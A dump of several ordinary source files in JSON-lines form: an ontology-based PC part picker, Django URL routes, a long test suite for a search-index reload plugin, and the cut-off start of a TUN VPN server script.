get_ontology(\"Shared6.owl\").load()\n\tobo = get_namespace(\"http://webprotege.stanford.edu/project/xpUFBIdmzwyCPpbfIg4hh\")\n\t# sync_reasoner()\n\n\tsearch_subclasses = None\n\tif is_IRIS:\n\t\tsearch_subclasses = onto.search(subclass_of = IRIS[class_id]) # bleh finally got this POS to work\n\telse:\n\t\tsearch_subclasses = onto.search(subclass_of = obo[class_id])\n\n\tsubclasses = []\n\tfor x in search_subclasses:\n\t\tprint(x)\n\t\tsubclasses.append(get_label(x))\n\treturn subclasses\n\ndef get_subclasses_onelevel(class_id):\n\tonto = None\n\tif is_debug:\n\t\tonto = get_ontology(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\").load()\n\telse:\n\t\tonto = get_ontology(\"Shared6.owl\").load()\n\tobo = get_namespace(\"http://webprotege.stanford.edu/project/xpUFBIdmzwyCPpbfIg4hh\")\n\t# sync_reasoner()\n\n\tsubclasses = []\n\tsearch_subclasses = onto.search(subclass_of = obo[class_id]) \n\tfor x in search_subclasses:\n\t\t# search thru all parents\n\t\tfor parent in x.is_a:\n\t\t\tcur_parent = str(parent)\n\t\t\tif class_id in cur_parent: \n\t\t\t\tsubclasses.append(get_label(x))\n\treturn subclasses\n\ndef get_indivs(class_id):\n\tonto = None\n\tif is_debug:\n\t\tonto = get_ontology(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\").load()\n\telse:\n\t\tonto = get_ontology(\"Shared6.owl\").load()\n\tobo = get_namespace(\"http://webprotege.stanford.edu/project/xpUFBIdmzwyCPpbfIg4hh\")\n\t# sync_reasoner()\n\n\t# special for memory\n\tif obo[class_id] == None or 'Memory' in str(obo[class_id].is_a[0]): # memory\n\t# if 'Memory' in str(obo[class_id].is_a[0]): # memory\n\t\treturn [obo.Memory(class_id)]\n\telse:\n\t\t# return [obo[class_id]]\n\t\tindivs = []\n\t\tfor i in obo[class_id].instances(): # only has bottom level indivs\n\t\t\tif str(i)[0] != 'x': \n\t\t\t\tprint(\"indiv: %s\", i)\n\t\t\t\tindivs.append(i)\n\t\treturn(indivs)\n\ndef get_obo_elem(elem_id):\n\tonto = None\n\tif is_debug:\n\t\tonto = get_ontology(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\").load()\n\telse:\n\t\tonto = get_ontology(\"Shared6.owl\").load()\n\tobo = get_namespace(\"http://webprotege.stanford.edu/project/xpUFBIdmzwyCPpbfIg4hh\")\n\t# sync_reasoner()\n\treturn obo[elem_id]\n\ndef save_computer(comp_name, parts):\n\tonto = None\n\tif is_debug:\n\t\tonto = get_ontology(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\").load()\n\telse:\n\t\tonto = get_ontology(\"Shared6.owl\").load()\n\tobo = get_namespace(\"http://webprotege.stanford.edu/project/xpUFBIdmzwyCPpbfIg4hh\")\n\t# make the computer\n\tobo_parts = []\n\tfor x in parts:\n\t\tobo_part = onto.search(iri = \"*\" + x)\n\t\tif len(obo_part) > 0:\n\t\t\tobo_parts.append(obo_part[0])\n\tnew_computer = obo.Computer(comp_name, namespace = onto, hasPart = obo_parts)\n\tonto.save(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\")\n\treturn new_computer\n\ndef recur_find_parent(cur_parent, possib_parents):\n\tif cur_parent is None or cur_parent == []:\n\t\treturn None\n\telse:\n\t\tif hasattr(cur_parent, \"is_a\"):\n\t\t\tparents = []\n\t\t\tfor new_parent in cur_parent.is_a: # is one of our direct parents a match?\n\t\t\t\tif hasattr(new_parent, \"name\"):\n\t\t\t\t\tnew_parent_name = new_parent.name\n\t\t\t\t\tfor par in possib_parents:\n\t\t\t\t\t\tif par == new_parent_name: # we have a match\n\t\t\t\t\t\t\treturn par\n\t\t\t\t\t\telif par == 'Motherboard' and par in new_parent_name: # mobo is a bit special\n\t\t\t\t\t\t\treturn 
par\n\t\t\t\tparents.append(recur_find_parent(new_parent, possib_parents))\n\t\t\tfor parent in parents:\n\t\t\t\tif parent in possib_parents:\n\t\t\t\t\treturn parent # keep going\n\t\t\n\ndef find_missing_parts(comp_name):\n\tonto = None\n\tif is_debug:\n\t\tonto = get_ontology(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\").load()\n\telse:\n\t\tonto = get_ontology(\"Shared6.owl\").load()\n\tobo = get_namespace(\"http://webprotege.stanford.edu/project/xpUFBIdmzwyCPpbfIg4hh\")\n\tall_parts = get_subclasses_onelevel('RDpBs6DXJfwjWljvKnjFFK7')\n\tcomp_parts = onto.search(iri = \"*\" + comp_name)[0].hasPart\n\tcomp_has = []\n\tfor part in comp_parts:\n\t\tcomp_has.append(recur_find_parent(part, all_parts))\n\t# now get the diff \n\tcomp_needs = list(set(all_parts) - set(comp_has))\n\treturn comp_needs\n\n\n\n\n\t\n\n\n\n\n\n\n\n","repo_name":"JacobusH/IntelligentAgents","sub_path":"partPicker.py","file_name":"partPicker.py","file_ext":"py","file_size_in_byte":5421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72762632554","text":"from django.conf.urls import patterns, include, url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.rate_list, name='list'),\n url(r'^(?P\\d+)/$', views.rate_as_field, name='as_field'),\n url(r'^suggestions/$', views.suggestions, name='suggestions'),\n url(r'^create/$', views.create_rate, name='create'),\n #url(r'^user_rate/(?P[\\w\\s@+.-]+)/$', views.edit_user_rate, name='edit_user_rate'),\n url(r'^(?P\\d+)/edit/$', views.edit_rate, name='edit'),\n url(r'^(?P\\d+)/delete/$', views.delete_rate, name='delete'),\n]\n","repo_name":"ExpoPythonist/ProveBanking__s","sub_path":"apps/rates/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"443717319","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nimport json\nimport os\nimport re\nimport shutil\nimport time\nimport unittest\nfrom collections import namedtuple\nfrom six.moves.configparser import ConfigParser\n\nimport context\nfrom context import get_plugin_path, get_plugins_dir_path\nfrom pyb.plugin import marketsearch\nfrom pyb.taskrunner import TaskRunner\nfrom pyb import report_config\nfrom .common import DummyTaskRunner, symlink, dist_names_test1_test2 # noqa\n\nfrom market.pylibrary.mi_util import util\nfrom async_publishing.group_config import GroupConfig\n\nfrom mock import Mock, patch\nimport pytest\n\n\ndef assert_not_called_with(self, *args, **kwargs):\n try:\n self.assert_called_with(*args, **kwargs)\n except AssertionError:\n return\n raise AssertionError('Expected %s to not have been called.' 
% self._format_mock_call_signature(args, kwargs))\n\n\nMock.assert_not_called_with = assert_not_called_with\n\n\nclass TimeoutException(Exception):\n pass\n\n\nclass Test(unittest.TestCase):\n _genlogs = ['20130920_1300', '20130920_1400', '20130920_1500', '20130920_1600', '20130920_1700']\n _dists = ['test1', 'test2', 'report-data']\n\n @pytest.fixture(scope='class', autouse=True)\n def patch_async_publishing_client(self):\n class Client:\n @property\n def my_group_config(self):\n json_config = {\n 'simultaneous_restart': None,\n 'failures_threshold': None,\n 'hosts': {\n \"1\": [\n {'key': 'rtc-123', 'fqdn': 'rtc-123.market.yandex.net', 'port': 17051, 'datacenter': None},\n ],\n \"2\": [\n {'key': 'rtc-321', 'fqdn': 'rtc-321.market.yandex.net', 'port': 17051, 'datacenter': None},\n ]\n }\n }\n return GroupConfig.from_str(json.dumps(json_config))\n\n with patch('pyb.plugin.marketsearch.AsyncPublishingClient', return_value=Client()):\n yield\n\n @pytest.fixture(scope='class', autouse=True)\n def patch_zk_client(self):\n with patch('pyb.zk.create_zk_client'):\n yield\n\n @pytest.fixture(scope='class', autouse=True)\n def patch_reload_lock_path(self):\n with patch('pyb.plugin.marketsearch.MarketSearch.get_reload_lock_path', return_value='reload.lock'):\n yield\n\n def _list_generations(self, directory):\n return [gen for gen in os.listdir(directory) if gen in self._genlogs]\n\n def setUp(self):\n self._src_dir = context.MARKETSEARCH_DATA_DIR\n self._work_dir = os.path.join(os.getcwd(), context.TMP_DIR, 'base_test')\n self._stub_dir = os.path.join(context.MARKETSEARCH_DATA_DIR, 'stub.py')\n self._clean()\n\n def tearDown(self):\n self._clean()\n\n @property\n def _dists_dir(self):\n return os.path.join(self._work_dir, 'dists')\n\n @property\n def _genlogs_dir(self):\n return os.path.join(self._work_dir, 'marketsearch')\n\n def _clean(self):\n shutil.rmtree(self._work_dir, ignore_errors=True)\n\n def _make_stubs(self):\n paths = [\n '/usr/bin/torrent_client_clt',\n '/usr/bin/sky_downloader',\n ]\n for path in paths:\n symlink(self._stub_dir, self._work_dir + path)\n\n def _prepare(self):\n self._clean()\n\n util.makedirs(self._work_dir)\n util.makedirs(self._dists_dir)\n util.makedirs(self._genlogs_dir)\n\n confs = ['marketsearch2.conf', 'marketsearch2_1.conf']\n for conf in confs:\n ptpl = os.path.join(self._src_dir, conf + '.tpl')\n with open(ptpl) as f:\n content = f.read()\n pconf = os.path.join(self._work_dir, conf)\n with open(pconf, 'w') as f:\n f.write(content.replace('%%WORKDIR%%', self._work_dir))\n\n files = ['httpsearch', 'checksearch', 'checksearch_fail', 'generate',\n 'timetail', 'preport.log', 'httpsearch_list']\n for file in files:\n src = os.path.join(self._src_dir, file)\n dst = os.path.join(self._work_dir, file)\n shutil.copy(src, dst)\n\n for genlog in self._genlogs:\n for dist in self._dists:\n path = os.path.join(self._work_dir, 'marketsearch', genlog, dist)\n util.makedirs(path)\n with open(os.path.join(path, 'completed'), 'w'):\n pass\n\n self._make_stubs()\n\n def _get_log_lines(self):\n with open(os.path.join(self._work_dir, 'marketsearch.log')) as f:\n return [v.strip() for v in f.readlines()]\n\n def _create(self, p_config, reports, experimental_unpack=False):\n dists = {}\n\n for dist in self._dists:\n dists[dist] = os.path.join(self._dists_dir, dist)\n\n class Context(object):\n def __init__(self, root_dir):\n self.name = os.path.basename(p_config)[:-len('.conf')]\n self.root_dir = root_dir\n self.task_runner = TaskRunner(root_dir)\n self.aria2_user = 
context.user_name()\n self.prefix_dir = None\n self.torrent_client = root_dir + '/usr/bin/torrent_client_clt'\n self.torrent_client_config = None\n self.sky_downloader_client = root_dir + '/usr/bin/sky_downloader'\n self.sky_downloader_client_config = None\n self.plugins_dir = os.path.dirname(p_config)\n self.backctld_port = None\n self.dists = dists\n self.experiment_flags_reader = None\n\n def get_path(self, path):\n return path\n\n ms = marketsearch.MarketSearch(Context(self._work_dir), plugin_config_path=p_config)\n ms._trunner = DummyTaskRunner()\n ms._config.httpsearch_list_path = os.path.join(self._work_dir, 'httpsearch_list')\n ms._r_supported = set(reports)\n ms._config.experimental_unpack = experimental_unpack\n return ms\n\n def _wait(self, ms, time_to_wait=30):\n start = time.time()\n retval = ms.check()\n while retval == '! in progress':\n # wait fot 30 seconds\n if time.time() > start + time_to_wait:\n raise TimeoutException()\n time.sleep(0.1)\n retval = ms.check()\n\n return retval\n\n def _check_structure(self, gen):\n dirs = os.listdir(self._dists_dir)\n self.assertEqual(set(dirs), set(self._dists))\n for dist in self._dists:\n src = os.path.join(self._dists_dir, dist)\n self.assertTrue(os.path.islink(src))\n dstreal = os.readlink(src)\n dstexp = os.path.join(self._work_dir, 'marketsearch', gen, dist)\n self.assertEqual(dstreal, dstexp)\n\n def test_all(self, experimental_unpack=False):\n self._prepare()\n\n p_config = os.path.join(self._work_dir, 'marketsearch2.conf')\n gen = '20130920_1600'\n saved_gens = [gen, '20130920_1700']\n reports = ['test1', 'test2', 'test3']\n\n # reload + check test\n # check if reload creates right dirs/links structure\n # ! there is no test when we put dists to shared memory\n ms = self._create(p_config, reports, experimental_unpack=experimental_unpack)\n ms.reload(gen)\n\n self.assertEquals(self._wait(ms), 'ok')\n self.assertEquals('! 
false', ms.is_reloading())\n\n self._check_structure(gen)\n\n dirs = self._list_generations(self._genlogs_dir)\n self.assertEqual(sorted(dirs), sorted(saved_gens))\n\n # test if ReloadLaucher generates report config\n with open('generated.cfg') as f:\n lines = [v.strip() for v in f.readlines()]\n self.assertEqual(lines, reports)\n\n # test if stop, start and check are called in right order and for all reports\n lines = self._get_log_lines()\n self.assertTrue(len(lines) >= 9)\n\n def check_lines(beg, end, irep, ok):\n processed = set()\n for i in range(beg, end):\n args = lines[i].split(' ')\n self.assertTrue(ok(args))\n processed.add(args[irep])\n if irep >= 0:\n self.assertEqual(set(reports), processed)\n\n check_lines(0, 3, 2, lambda a: len(a) == 3 and a[0] == 'httpsearch' and a[1] == 'close-for-load')\n check_lines(3, 6, 2, lambda a: len(a) == 3 and a[0] == 'httpsearch' and a[1] == 'stop')\n check_lines(6, 9, 2, lambda a: len(a) == 3 and a[0] == 'httpsearch' and a[1] == 'start')\n check_lines(9, 12, -1, lambda a: len(a) == 3 and a[0] == 'httpsearch' and a[1] == 'status')\n check_lines(12, 15, 1, lambda a: len(a) >= 2 and a[0] == 'checksearch')\n\n # rm_inactive_gens test\n src = os.path.join(self._work_dir, 'marketsearch', gen)\n dst = os.path.join(self._work_dir, 'report_data')\n os.symlink(src, dst)\n for genlog in self._genlogs:\n path = os.path.join(self._work_dir, 'marketsearch', genlog)\n if not os.path.exists(path):\n util.makedirs(path)\n\n retval = ms.rm_inactive_gens()\n self.assertEqual(retval, 'ok')\n generations = self._list_generations(self._genlogs_dir)\n self.assertEqual(sorted(generations), sorted(saved_gens))\n\n def test_all_experimental_unpack(self):\n return self.test_all(experimental_unpack=True)\n\n @pytest.mark.usefixtures('dist_names_test1_test2')\n def test_get_downloaded_generations(self):\n self._prepare()\n\n p_config = os.path.join(self._work_dir, 'marketsearch2.conf')\n ms = self._create(p_config, ['test1'])\n\n # make 20130920_1500 generation incomplete (no \"completed\" file)\n os.remove(os.path.join(self._work_dir, 'marketsearch', '20130920_1500', 'test2', 'completed'))\n self.assertEqual(ms.get_downloaded_generations(), '20130920_1700,20130920_1600,20130920_1400,20130920_1300')\n\n # make 20130920_1400 generation incomplete (missing directory for a dist)\n shutil.rmtree(os.path.join(self._work_dir, 'marketsearch', '20130920_1400', 'test2'))\n self.assertEqual(ms.get_downloaded_generations(), '20130920_1700,20130920_1600,20130920_1300')\n\n def test_reload_choose_gen(self):\n self._prepare()\n\n p_config = os.path.join(self._work_dir, 'marketsearch2.conf')\n ms = self._create(p_config, ['test1'])\n ms.reload()\n self.assertEquals(self._wait(ms), 'ok')\n self._check_structure(self._genlogs[-1])\n\n def test_reload_error(self):\n self._prepare()\n for genlog in self._genlogs:\n dir = os.path.join(self._genlogs_dir, genlog)\n shutil.rmtree(dir, ignore_errors=True)\n p_config = os.path.join(self._work_dir, 'marketsearch2.conf')\n ms = self._create(p_config, ['test1'])\n ms.reload()\n self.assertTrue(self._wait(ms).startswith('! 
failed'))\n self.assertEqual(ms._trunner.get(ms._name).result, \"can't get generation for reload\")\n\n def test_unpack_reload(self):\n self._prepare()\n p_config = os.path.join(self._work_dir, 'marketsearch2.conf')\n ms = self._create(p_config, ['test1'])\n ms.unpack_reload(None, None)\n self.assertEquals(self._wait(ms), 'ok')\n\n def test_generation_fqdn_config(self):\n self._prepare()\n p_config = os.path.join(self._work_dir, 'marketsearch2.conf')\n ms = self._create(p_config, ['test1'])\n ms.restart()\n self.assertEquals(self._wait(ms), 'ok')\n fqdn_config_path = os.path.join(self._work_dir, 'fqdn.json')\n with open(fqdn_config_path) as fqdn_config_file:\n fqdn_json = json.load(fqdn_config_file)\n self.assertEqual(fqdn_json, {'rtc-123': 'rtc-123.market.yandex.net', 'rtc-321': 'rtc-321.market.yandex.net'})\n\n\nclass SimpleTest(unittest.TestCase):\n def test_calc_gens_to_save(self):\n calc = marketsearch.calc_gens_to_save\n\n self.assertEquals(calc([3, 2, 1], [], num_to_save=1), [3])\n self.assertEquals(calc([3, 2, 1], [], num_to_save=2), [3, 2])\n\n self.assertEquals(calc([3, 2, 1], [1], num_to_save=1), [1])\n self.assertEquals(calc([3, 2, 1], [1], num_to_save=2), [1, 3])\n self.assertEquals(calc([3, 2, 1], [1], num_to_save=3), [1, 3, 2])\n self.assertEquals(calc([3, 2, 1], [1], num_to_save=4), [1, 3, 2])\n\n self.assertEquals(calc([3, 2, 1], [1, 2], num_to_save=1), [1, 2])\n\n self.assertEquals(calc([3, 2, 1], white_list=[1, 1], num_to_save=2), [1, 3])\n\n def test_stamp_to_date(self):\n date_short = util.stamp_to_datetime('20161230_1300')\n self.assertEqual(date_short, datetime.datetime(2016, 12, 30, 13, 0))\n date_long = util.stamp_to_datetime('20161230_130015')\n self.assertEqual(date_long, datetime.datetime(2016, 12, 30, 13, 0, 15))\n\n\nclass ConfigsConsistencyTest(unittest.TestCase):\n def test_marketsearch_snippet(self):\n def get_dists_count(pattern, config):\n return len([name for name, _ in config.items('dists') if re.match(pattern, name) is not None])\n\n marketsearch = ConfigParser()\n marketsearch.read(get_plugin_path('marketsearch3.conf'))\n\n snippet = ConfigParser()\n snippet.read(get_plugin_path('marketsearchsnippet.conf'))\n\n self.assertEqual(get_dists_count(r'search-part-\\d+', marketsearch), get_dists_count(r'search-snippet-\\d+', snippet))\n self.assertEqual(1, get_dists_count('search-snippet-data', snippet))\n\n\nclass IptrulerTest(unittest.TestCase):\n def test(self):\n \"\"\"Проверяем Report\n close_iptruler\n open_iptruler\n \"\"\"\n def check(reportname):\n class Iptruler(object):\n port_down = None\n port_up = None\n\n def down(self, port):\n self.port_down = port\n\n def up(self, port):\n self.port_up = port\n\n report = marketsearch.create_report(reportname)\n iptruler = Iptruler()\n\n logger_mock = Mock()\n system_ex_mock = Mock(return_value=0)\n with patch('market.pylibrary.mi_util.util.watching_system_ex', system_ex_mock):\n with patch('logging.getLogger', Mock(return_value=logger_mock)):\n report.close_iptruler('/etc/init.d/mockhttpsearch', iptruler)\n\n system_ex_mock.assert_called_with(['/etc/init.d/mockhttpsearch', 'close-for-load', reportname])\n self.assertEquals(logger_mock.info.called, 1)\n self.assertEquals(logger_mock.error.called, 0)\n\n report.open_iptruler('/etc/init.d/mockhttpsearch', iptruler)\n\n system_ex_mock.assert_called_with(['/etc/init.d/mockhttpsearch', 'open-for-load', reportname])\n self.assertEquals(logger_mock.info.called, 1)\n self.assertEquals(logger_mock.error.called, 0)\n\n self.assertEqual(iptruler.port_down, 
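Aside on the test_calc_gens_to_save assertions above: they pin down the selection rule (whitelisted generations are always kept, de-duplicated, and listed first; the remainder is filled from the newest generations up to num_to_save). A hypothetical implementation consistent with those assertions; the real one lives in pyb.plugin.marketsearch and may differ:

def calc_gens_to_save(all_gens, white_list, num_to_save):
    # Whitelisted generations are always kept (order preserved, duplicates
    # dropped), even when they alone exceed num_to_save.
    saved = []
    for gen in white_list:
        if gen not in saved:
            saved.append(gen)
    # Fill up to num_to_save with the remaining generations, newest first
    # (all_gens is assumed to arrive newest-first, as in the tests).
    for gen in all_gens:
        if len(saved) >= num_to_save:
            break
        if gen not in saved:
            saved.append(gen)
    return saved

assert calc_gens_to_save([3, 2, 1], [1], 2) == [1, 3]
assert calc_gens_to_save([3, 2, 1], [1, 2], 1) == [1, 2]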
iptruler.port_up)\n\n check('market-report')\n check('market-parallel-report')\n check('market-ppcshop-report')\n check('market-snippet-report')\n\n def test_fail_to_change_report_state(self):\n \"\"\"\n Проверяем, что при неудачной попытке поменять состояние репорта:\n 1. Iptruler все равно делает свою работу\n 2. Сообщение об этой неудачной попытке попадает в error log\n \"\"\"\n report = marketsearch.create_report('market-report')\n\n iptruler_mock = Mock()\n logger_mock = Mock()\n system_ex_mock = Mock(return_value=1)\n with patch('market.pylibrary.mi_util.util.watching_system_ex', system_ex_mock):\n with patch('logging.getLogger', Mock(return_value=logger_mock)):\n report.close_iptruler('/etc/init.d/mockhttpsearch', iptruler_mock)\n\n iptruler_mock.down.assert_called_with(17051)\n system_ex_mock.assert_called_with(['/etc/init.d/mockhttpsearch', 'close-for-load', 'market-report'])\n self.assertEquals(logger_mock.error.called, 1)\n self.assertEquals(logger_mock.info.called, 0)\n\n report.open_iptruler('/etc/init.d/mockhttpsearch', iptruler_mock)\n\n iptruler_mock.up.assert_called_with(17051)\n system_ex_mock.assert_called_with(['/etc/init.d/mockhttpsearch', 'open-for-load', 'market-report'])\n self.assertEquals(logger_mock.error.called, 1)\n self.assertEquals(logger_mock.info.called, 0)\n\n\nclass ReloadTest(unittest.TestCase):\n def setUp(self, ):\n self._work_dir = os.path.join(os.getcwd(), context.TMP_DIR, 'reload_test')\n util.makedirs(self._work_dir)\n\n marketsearch3 = marketsearch.Config(get_plugin_path('marketsearch3.conf'), self._work_dir, 'user')\n marketsearch3.reportconf_gen = 'reportconf_gen'\n marketsearch3.mini_tank = 'mini_tank'\n self.marketsearch3 = marketsearch3\n\n plugins_dir = get_plugins_dir_path()\n prefix_dir = str(self._work_dir)\n\n DummyContext = namedtuple('DummyContext', 'config, full_config, plugins_dir, prefix_dir')\n self.context = DummyContext(marketsearch3, marketsearch3, plugins_dir, prefix_dir)\n\n report_config.SERVANTS_FILE = os.path.join(context.MARKETSEARCH_DATA_DIR, 'httpsearch_list')\n DummyServantConfig = namedtuple('ServantConfig', ['market_report', 'server', 'collections'])\n self.dummy_servant_config = DummyServantConfig(\n market_report={},\n server={'Port': '17051'},\n collections={\n 'basesearch16-0': {},\n 'basesearch16-8': {},\n }\n )\n self.servant_config_patcher = patch(\n 'pyb.report_config.read_servant_config',\n return_value=self.dummy_servant_config\n )\n self.servant_config_patcher.start()\n Responce = namedtuple('Responce', ['status_code', 'text'])\n self.requests_get_patcher = patch(\n 'requests.get',\n return_value=Responce(200, 'ok')\n )\n self.get_mock = self.requests_get_patcher.start()\n self.watched_system_ex_patcher = patch('market.pylibrary.mi_util.util.watching_system_ex', return_value=0)\n self.watched_system_ex_mock = self.watched_system_ex_patcher.start()\n\n def tearDown(self):\n shutil.rmtree(self._work_dir, ignore_errors=True)\n self.watched_system_ex_patcher.stop()\n self.servant_config_patcher.stop()\n self.requests_get_patcher.stop()\n\n def _launcher(self, name, context=None, downloading_generations=None, open_for_load=True):\n if context is None:\n context = self.context\n\n if downloading_generations is None:\n downloading_generations = []\n\n launcher = marketsearch.DefaultReloadLauncher(\n self.context,\n name,\n downloading_generations,\n ['market-report'],\n open_for_load)\n # не пытаемся стартовать репорт на самом деле\n launcher._start_httpsearch_sync = lambda t: None\n launcher._update_quick_data = 
lambda: None\n return launcher\n\n def _set_current_generation(self, config, name):\n root_dir = os.path.join(self._work_dir, 'var/lib/search/')\n download_dir = os.path.join(root_dir, config.download_dir)\n util.makedirs(download_dir)\n util.atomic_write(os.path.join(download_dir, 'current.generation'), name)\n\n def _make_base_gen(self, name, published=False, additional_files=None, creation_time=None, meta=False):\n additional_files = additional_files or []\n root_dir = os.path.join(self._work_dir, 'var/lib/search/')\n for dist_name, dist_dir in self._dists(root_dir, self.marketsearch3, name, published=published):\n if (not meta and '-meta-' in dist_name) or (meta and '-meta-' not in dist_name):\n continue\n util.makedirs(dist_dir)\n self._create_file(os.path.join(dist_dir, 'content'), 'full ' + name, creation_time)\n\n if dist_name in ('search-report-data', 'search-meta-report-data'):\n backends_dir = os.path.join(dist_dir, 'backends')\n util.makedirs(backends_dir)\n self._create_file(os.path.join(backends_dir, 'content'), 'full ' + name, creation_time)\n if dist_name.startswith('search-part-'):\n qbids_generatioin = os.path.join(dist_dir, 'market_qbids.generation')\n self._create_file(qbids_generatioin, name + '00', creation_time)\n for file in additional_files:\n self._create_file(os.path.join(root_dir, file), 'full ' + name, creation_time)\n if published:\n self._set_current_generation(self.marketsearch3, name)\n if not published and creation_time is not None:\n generation_path = os.path.join(root_dir, self.marketsearch3.download_dir, name)\n self._set_mtime(generation_path, creation_time)\n\n def _dists(self, root_dir, config, generation_name, published=False):\n if published:\n for name, rel_path in config.dists:\n dist_path = os.path.join(root_dir, rel_path)\n yield name, dist_path\n else:\n for name, rel_path in config.dists:\n download_dir = os.path.join(root_dir, config.download_dir)\n yield name, os.path.join(download_dir, generation_name, name, '{}-{}'.format(name, generation_name))\n\n @staticmethod\n def _set_mtime(path, ts):\n os.utime(path, (ts, ts))\n\n @classmethod\n def _create_file(cls, path, content, creation_time=None):\n util.atomic_write(path, content)\n if creation_time is not None:\n cls._set_mtime(path, creation_time)\n\n def _get_generation_path(self, generation_name):\n root_dir = os.path.join(self._work_dir, 'var/lib/search/')\n return os.path.join(root_dir, self.marketsearch3.download_dir, generation_name)\n\n @property\n def _current_generation(self):\n root_dir = os.path.join(self._work_dir, 'var/lib/search/')\n current_full_path = os.path.join(root_dir, self.marketsearch3.download_dir, 'current.generation')\n return util.get_file_value(current_full_path)\n\n def test_not_published_gen(self):\n self._make_base_gen('20170320_1000')\n self._launcher('20170320_1000')\n self.assertEqual('', self._current_generation)\n\n def test_reload_full(self):\n old_gen_path = self._get_generation_path('20100101_0001')\n\n self._make_base_gen('20100101_0001', creation_time=1262329200)\n self._make_base_gen('20170320_0900')\n self._make_base_gen('20170320_1000', published=True)\n self._make_base_gen('20170320_1100')\n self.assertEqual('20170320_1000', self._current_generation)\n self.assertFalse(self.get_mock.called)\n self.assertTrue(os.path.exists(old_gen_path))\n\n launcher = self._launcher('20170320_1100', downloading_generations=['20100101_0001'])\n launcher.launch(0)\n\n self.assertEqual('20170320_1100', self._current_generation)\n # проверяем, что очень старое так и 
не скачавшееся поколение 20100101_0001 было удалено\n self.assertFalse(os.path.exists(old_gen_path))\n # открываемся от балансера после релода full\n httpsearch_cmd = os.path.join(self._work_dir, 'etc/init.d/httpsearch')\n self.watched_system_ex_mock.assert_any_call([httpsearch_cmd, 'open-for-load', 'market-report'])\n\n def test_reload_closed(self):\n\n self._make_base_gen('20100101_0001', creation_time=1262329200)\n self._make_base_gen('20170320_1000', published=True)\n self._make_base_gen('20170320_1100')\n self.assertEqual('20170320_1000', self._current_generation)\n self.assertFalse(self.get_mock.called)\n\n launcher = self._launcher('20170320_1100', downloading_generations=['20100101_0001'], open_for_load=False)\n launcher.launch(0)\n\n self.assertEqual('20170320_1100', self._current_generation)\n # не открываемся от балансера, если не указано обратного\n httpsearch_cmd = os.path.join(self._work_dir, 'etc/init.d/httpsearch')\n self.watched_system_ex_mock.assert_not_called_with([httpsearch_cmd, 'open-for-load', 'market-report'])\n\n def test_reload_meta(self):\n old_gen_path = self._get_generation_path('20200101_0001')\n\n self._make_base_gen('20200101_0001', creation_time=1262329200, meta=True)\n self._make_base_gen('20270320_0900', meta=True)\n self._make_base_gen('20270320_1000', published=True, meta=True)\n self._make_base_gen('20270320_1100', meta=True)\n self.assertEqual('20270320_1000', self._current_generation)\n self.assertFalse(self.get_mock.called)\n self.assertTrue(os.path.exists(old_gen_path))\n\n launcher = self._launcher('20270320_1100', downloading_generations=['20200101_0001'])\n launcher.launch(0)\n\n self.assertEqual('20270320_1100', self._current_generation)\n # проверяем, что очень старое так и не скачавшееся поколение 20200101_0001 было удалено\n self.assertFalse(os.path.exists(old_gen_path))\n # открываемся от балансера после релода full\n httpsearch_cmd = os.path.join(self._work_dir, 'etc/init.d/httpsearch')\n self.watched_system_ex_mock.assert_any_call([httpsearch_cmd, 'open-for-load', 'market-report'])\n\n def test_keep_very_old_generations(self):\n \"\"\" В тесте проверяем, что старые поколения не будут удалены, если лимит\n по количеству хранимых поколений не превышен.\n\n * old_gen – это очень старое поколение, оно сейчас используется. 
А еще оно в 10 раз старше,\n чем позволяет трешолд TOO_OLD_DOWNLOADING_GENERATION_S.\n * new_gen – новое поколение, которое только скачалось, на него будет выполнен релоад.\n \"\"\"\n\n now_ts = time.time()\n old_ts = now_ts - 10 * marketsearch.DefaultReloadLauncher.TOO_OLD_DOWNLOADING_GENERATION_S\n old_gen = '20210101_0100'\n new_gen = '20210301_0200'\n old_gen_path = self._get_generation_path(old_gen)\n new_gen_path = self._get_generation_path(new_gen)\n\n self._make_base_gen(old_gen, creation_time=old_ts)\n self._make_base_gen(old_gen, published=True)\n self._make_base_gen(new_gen, creation_time=now_ts)\n\n # оба поколения присутствуют на диске\n self.assertTrue(os.path.exists(old_gen_path))\n self.assertTrue(os.path.exists(new_gen_path))\n\n # релоад на new_gen\n launcher = self._launcher(new_gen)\n launcher.launch(0)\n\n # после релоада старое поколение не было удалено\n self.assertTrue(os.path.exists(old_gen_path))\n self.assertTrue(os.path.exists(new_gen_path))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/tests/test_marketsearch.py","file_name":"test_marketsearch.py","file_ext":"py","file_size_in_byte":27686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5509310204","text":"#!/usr/bin/env python3\nimport ssl\n\nfrom scapy.all import *\nimport fcntl\nimport struct\nimport os\nimport time\n\nfrom scapy.layers.inet import IP\n\n# TUN interface\nTUNSETIFF = 0x400454ca\nIFF_TUN = 0x0001\nIFF_TAP = 0x0002\nIFF_NO_PI = 0x1000\n\n# Create the tun interface\ntun = os.open(\"/dev/net/tun\", os.O_RDWR)\nifr = struct.pack('16sH', b'sen%d', IFF_TUN | IFF_NO_PI)\nifname_bytes = fcntl.ioctl(tun, TUNSETIFF, ifr)\n\n# Get the interface name\nifname = ifname_bytes.decode('UTF-8')[:16].strip(\"\\x00\")\nprint(\"Interface Name: {}\".format(ifname))\n\n# Configure the tun interface\nos.system(\"ip addr add 192.168.53.11/24 dev {}\".format(ifname))\nos.system(\"ip link set dev {} up\".format(ifname))\n\n\n# UDP server\nIP_A = '0.0.0.0'\nPORT = 9090\n\n# Set context\ncertFile = './certs/server.crt'\nkeyFile = './certs/server.key'\ncontext = 